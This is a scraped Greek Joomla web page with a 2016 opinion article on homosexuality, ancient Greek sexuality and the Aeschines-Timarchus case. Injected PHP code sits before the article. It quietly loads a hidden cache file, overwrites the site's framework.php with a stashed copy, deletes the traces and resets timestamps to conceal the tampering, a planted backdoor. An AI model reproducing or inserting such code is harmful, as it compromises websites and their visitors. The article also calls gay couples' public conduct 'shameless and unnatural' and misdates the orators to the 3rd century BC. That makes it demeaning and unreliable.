$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Κοινωνικό στίγμα, η ομοφυλία, ανέκαθεν
YT Expo - шаблон joomla Mp3
Εκτύπωση
PDF
01
Φεβρουάριος
2016

Κοινωνικό στίγμα, η ομοφυλία, ανέκαθεν

O λόγος, σήμερα, περί ομοφυλίας. Όχι επειδή ψήφισε η Βουλή το νόμιμο της συμβίωσης

ομόφυλων ζευγαριών, ούτε επειδή ξεσηκώθηκε τόσος θόρυβος για το αναίσχυντο και  αφύσικο της δημόσιας συμπεριφοράς των. Ούτε αν για την περίπτωσή τους υπεύθυνη είναι η φύση, που παρεξέκλινε το «κατά φύσιν» σε «παρά φύσιν».Το θέμα είναι σαν τα αναμμένα κάρβουνα. Όταν τα πιάσεις θα καείς και άμα είναι σβηστά μουτζουρώνουν.

Έχουν γραφτεί σημαντικά βιβλία για τη σεξουαλική ζωή στην αρχαία Ελλάδα, του Γερμανού Χανς Λιχ «Η σεξουαλική ζωή στην αρχαία Ελλάδα» σελίδες 555, εκδόσεις «Μέλισσα» και πρόσφατα «Η ομοφυλοφιλία στην αρχαία Ελλάδα – ο μύθος καταρρέει» του Άδωνι Γεωργιάδη. Εκεί παρατίθενται στοιχεία, για το πώς ικανοποιούσαν τις ερωτικές τους ορέξεις, οι αρχαίοι πρόγονοί μας και σε ποιο επίπεδο ήσαν αυτές αλλά και η Πολιτεία πώς αντιμετώπιζε αυτό το φαινόμενο.

Με αφορμή μια πολιτική αντιδικία που είχαν ανοίξει δυο σπουδαίοι ρήτορες του 3ου αι. π.Χ., Ο Δημοσθένης και ο  Αισχίνης, σε μια από αυτές ο Δημοσθένης, θέλοντας να προσεταιρισθεί ως συγκατήγορον, κατά του Αισχίνη, κάποιον Τίμαρχον, άνθρωπον  πλουσιότατον και με μεγάλη επιρροή, ο Αισχίνης για ν’ ανταποδώσει το πλήγμα, κατηγόρησε τον Τίμαρχον ως ανήθικον, του οποίου οι πράξεις προσέβαλλαν τη δημόσια αιδώ. Αν η κατηγορία αυτή αποδεικνυόταν, ο Τίμαρχος δε θα μπορούσε να ανέλθει στο βήμα της εκκλησίας του Δήμου. Μετά την καταδικαστική εις βάρος του απόφαση, ο Τίμαρχος εξαφανίσθηκε από την πολιτική σκηνή.